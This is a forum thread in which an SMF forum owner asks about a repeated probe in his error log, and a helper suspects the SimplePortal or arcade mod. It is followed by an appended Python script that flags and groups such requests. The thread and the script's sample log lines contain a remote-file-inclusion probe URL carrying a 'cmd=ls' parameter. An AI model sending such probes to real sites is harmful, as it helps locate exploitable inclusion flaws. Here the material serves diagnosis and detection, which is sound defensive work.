Question about (attempted?) hack revealed in error log

Started by busterone, August 10, 2014, 10:24:55 AM

busterone

This error is in my log about 100+ times, all from the same IP range of a known spam/hacker bank of dedicated servers. 6 different IPs from the same range have been hammering away with the exact same attempt for about 3 hours straight.
No harm done of course, and when I attempt the same string, I receive the "sorry, smf could not connect to the database" page.
I am just curious exactly what they are attempting to do here, possibly a db injection?
(actual path x'd out for this post)

http://www.thedemonsden.com/index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
Undefined offset: 0
File: /homepages/xxxxxxxxxxxxxxx/htdocs/forum/Sources/Subs-Db-mysql.php
Line: 103

Arantor

This is a curious one.

What mods do you have installed?

busterone

Mod list
1. SMF 2.0.8 Update 1.0
2. SMF 2.0.7 Update 1.0
3. Add IP2Location to Track IP 1.31
4. SMF 1.1.19 / 2.0.6 Update 1.0
5. Treasury 2.12
6. SMF 2.0.5 Update 1.0
7. Misc Anti Spam 1.0
8. Stupid bouncy BBC 1.0
9. SMF 2.0.4 Update 1.0
10. SMF 2.0.3 Update 1.0
11. Annoy User 1.2.2
12. SimplePortal 2.3.5
13. SMF 2.0.2 Update 1.0
14. SMF 2.0.1 Update 1.0
15. SMF4Mobile Mod 1.0
16. Sitemap 2.2.0
17. LMGTFY BBcode v2.2 2.2
18. Bookmarks 2.3
19. Spoiler Tag 0.7.2
20. PM Attachments 1.6
21. Custom Action Mod 3.2
22. httpBL 2.5.1
23. Stop Spammer 2.3.9
24. SMF Chess 2.1.4
25. SMF Staff Page 1.7
26. PM to New Members 1.2
27. Aeva ~ Auto-Embed Video & Audio 7.0
28. The Rules 1.2
29. Add Domaintools to TrackIP 1.1
30. Arcadeworld Template 2.4
31. E-Arcade Beta4-SMF2rc2

Arantor

Hmmm, I'm wondering if it's possibly a bug in either the arcade or SimplePortal since both do a bunch of handling that isn't just through the normal index.php?action= or ?topic= or ?board= routes. In particular, page is one set up by SimplePortal.

I don't think it's a vulnerability per se but I find it interesting how it produces that exact result since that shouldn't generally be possible in SMF.

busterone

Yeah, I was curious as well. No harm done, no access, but it did set my alert level on high when the error log was full of them. I deleted the error log and haven't seen one in the last hour, so I presume whatever the bots were attempting, they gave up on. I started to block the entire range in .htaccess, but I think I will wait a while and see if they return with any new tricks. The arcade is only accessible to logged-in users, so a guest couldn't pull it off on the arcade as far as I know. SimplePortal is a different story though. I will keep a close watch for a few days to see if they return. The host is Versaweb, known for spammers.

Arantor

It's not about whether it's enabled or not to guests. Fact is, someone's trying to access that URL (which is generally an SP URL, but the arcade has special URL handling) directly and with invalid options.

I would mention it to SP in case it's something they're not aware of (since the behaviour of $_GET in that situation is... unusual).

busterone

Thanks. I will get on it tomorrow. Tonight it is time to get offline and sleep. :)
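
A log-triage sketch for the request shown in the first post, added here as an example and not code from the thread, SMF or SimplePortal: it flags requests whose query string carries a remote URL as a parameter value, notes when the parameter name uses PHP's array syntax (page[path]), and groups the hits by /24 range. The log lines are constructed samples in common access-log format using documentation IP ranges, and the function names are assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample lines (documentation IP ranges, not taken from the thread).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Aug/2014:07:01:02 +0000] "GET /index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls HTTP/1.1" 200 512
203.0.113.11 - - [10/Aug/2014:07:01:09 +0000] "GET /index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls HTTP/1.1" 200 512
203.0.113.42 - - [10/Aug/2014:07:02:30 +0000] "GET /index.php?page%5Bpath%5D=http%3A%2F%2Fwww.google.com%2Fhumans.txt HTTP/1.1" 200 512
198.51.100.7 - - [10/Aug/2014:07:03:00 +0000] "GET /index.php?page=rules HTTP/1.1" 200 2048
198.51.100.8 - - [10/Aug/2014:07:03:05 +0000] "GET /index.php?topic=42.0 HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def probe_reasons(target):
    """Return why a request target looks like an include probe (empty list if not)."""
    reasons = []
    query = target.partition("?")[2]
    # parse_qsl percent-decodes names and values, so page%5Bpath%5D is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            reasons.append(f"{name}: value is a remote URL")
            if "[" in name and name.endswith("]"):
                # PHP parses name[key]=v into an array; code expecting a string may mishandle it.
                reasons.append(f"{name}: array-style parameter name")
    return reasons

def summarize(log_text):
    """Group flagged requests by /24 as {range: (hits, distinct source IPs)}."""
    ranges = defaultdict(lambda: {"hits": 0, "ips": set()})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m or not probe_reasons(m.group(2)):
            continue
        net = str(ipaddress.ip_network(f"{m.group(1)}/24", strict=False))
        ranges[net]["hits"] += 1
        ranges[net]["ips"].add(m.group(1))
    return {net: (d["hits"], len(d["ips"])) for net, d in ranges.items()}

if __name__ == "__main__":
    for net, (hits, ips) in summarize(SAMPLE_LOG).items():
        print(f"{net}: {hits} flagged requests from {ips} distinct IPs")
```
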
